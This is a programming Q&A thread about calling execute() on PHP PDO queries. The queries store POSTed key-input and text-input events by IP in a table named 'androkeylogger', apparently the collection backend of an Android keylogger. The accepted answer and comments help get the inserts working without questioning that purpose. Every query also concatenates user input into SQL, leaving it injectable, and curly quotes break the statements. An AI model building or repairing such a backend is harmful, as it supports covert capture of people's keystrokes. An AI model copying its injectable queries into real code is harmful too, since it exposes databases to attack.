# PHP- PDO MySQL execute();

Tags: php, mysql, pdo

I am using PDO MySQL to insert POST data in MySQL server. My code is:

```
<?php
$ip = $_SERVER['REMOTE_ADDR']
$type = $_POST['type'];
$data = $_POST['data'];
$server = localhost;
$mysql_user = dbuser;
$mysql_pass = passwd;
$useDb = android;

$dsn = sprintf('mysql:host=%s; dbname=%s', $server, $useDb);
$pdo = new PDO($dsn, $mysql_user, $mysql_pass);
$pdo->setAttribute(PDO::ATTR_TIMEOUT, 1);
$pdo->setAttribute(PDO::ATTR_PERSISTENT, false);
$pdo->setAttribute(PDO::MYSQL_ATTR_INIT_COMMAND, 'SET NAMES utf8');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);

switch($type)
{
    case 'keyinputevent':
        $query = $pdo->prepare(' SELECT * FROM androkeylogger WHERE ip = ‘$ip’ AND type = ‘keyinputevent’ ');
        $query->execute();
        $rows = $query->rowCount();
        if ($rows > 0) {
            $pdo->prepare(' UPDATE androkeylogger SET data = CONCAT(data, ‘$data’) WHERE ip = ‘$ip’ AND type = ‘keyinputevent’ ');
        }
        else {
            $pdo->prepare(' INSERT into androkeylogger (ip, type, data) VALUES(‘$ip’, ‘$type’, ‘$data’)');
        }
        break;

    case 'textinputevent':
        $query = $pdo->prepare(' SELECT * FROM androkeylogger WHERE ip = ‘$ip’ AND type = ‘textinputevent’ ');
        $query->execute();
        $rows = $query->rowCount();
        if ($rows > 0) {
            $pdo->prepare(' UPDATE androkeylogger SET data = CONCAT(data, ‘$data’) WHERE ip = ‘$ip’ AND type = ‘textinputevent’ ');
        }
        else {
            $pdo->prepare(' INSERT into androkeylogger (ip, type, data) VALUES(‘$ip’, ‘$type’, ‘$data’) ');
        }
        break;
}
?>
```

In the if else statements, should I add
$pdo->execute(); to execute the query? Any help would be appreciated.

EDIT: i have changed query variable name in if..else statements. Is this correct now?

```
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$type = $_POST['type'];
$data = $_POST['data'];
$server = localhost;
$mysql_user = dbuser;
$mysql_pass = passwd;
$useDb = android;

$dsn = sprintf('mysql:host=%s;dbname=%s', $server, $useDb);
$pdo = new PDO($dsn, $mysql_user, $mysql_pass);
$pdo->setAttribute(PDO::ATTR_TIMEOUT, 1);
$pdo->setAttribute(PDO::ATTR_PERSISTENT, false);
$pdo->setAttribute(PDO::MYSQL_ATTR_INIT_COMMAND, 'SET NAMES utf8');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);

switch($type)
{
case 'keyinputevent':
$query = $pdo->prepare(' SELECT * FROM androkeylogger WHERE ip = ‘$ip’ AND type = ‘keyinputevent’ ');
$query->execute();
$rows = $query->rowCount();
if ($rows > 0) {
$query2 = $pdo->prepare(' UPDATE androkeylogger SET data = CONCAT(data, ‘$data’) WHERE ip = ‘$ip’ AND type = ‘keyinputevent’ ');
}
else {
$query2=$pdo->prepare(' INSERT into androkeylogger (ip, type, data) VALUES(‘$ip’, ‘$type’, ‘$data’)');
}
$query2->execute(); 
break;

case 'textinputevent':
$query = $pdo->prepare(' SELECT * FROM androkeylogger WHERE ip = ‘$ip’ AND type = ‘textinputevent’ ');
$query->execute();
$rows = $query->rowCount();
if ($rows > 0) {
$query2 = $pdo->prepare(' UPDATE androkeylogger SET data = CONCAT(data, ‘$data’) WHERE ip = ‘$ip’ AND type = ‘textinputevent’ ');
}
else { 
$query2 = $pdo->prepare(' INSERT into androkeylogger (ip, type, data) VALUES(‘$ip’, ‘$type’, ‘$data’) ');
}
$query2->execute(); 
break;
}
?>
```

Comment: Your code would be SO much easier to read if you started to use indentation. You also use pretty quotes (`‘’`) instead of regular quotes (`''`) which mean that your sql will fail. You're also pasting variables directly into your SQL query meaning that you're open to SQL injection. Bind your variables instead of pasting them in the query.

Comment: I am not using pretty quotes, they're regular. Can you explain how to avoid SQLi?

Comment: By binding your variables instead of pasting them in the query. And you are. `SELECT * FROM androkeylogger WHERE ip = ‘$ip’` is not the same as `SELECT * FROM androkeylogger WHERE ip = '$ip'`

Answer (score 1, accepted):

Yes, you have prepared a second query (i.e. the queries in you if...else statements, but you need to call execute to make the query actually take place. I'd do something like this:

```
if ($rows > 0) {
    $query2 = $pdo->prepare(' UPDATE androkeylogger SET data = CONCAT(data, ‘$data’) WHERE ip = ‘$ip’ AND type = ‘textinputevent’ ');
} else {
    $query2  = $pdo->prepare(' INSERT into androkeylogger (ip, type, data) VALUES(‘$ip’, ‘$type’, ‘$data’) ');
}
$query2->execute();
break;
```

Comment: Looks good to me, have you tried running this yet? (assuming your queries are ok for what you're trying to achieve of course ;) )

Comment: Haven't run it yet cuz I'd like to assure if its okay or not, thank you for the answer. I'll try :)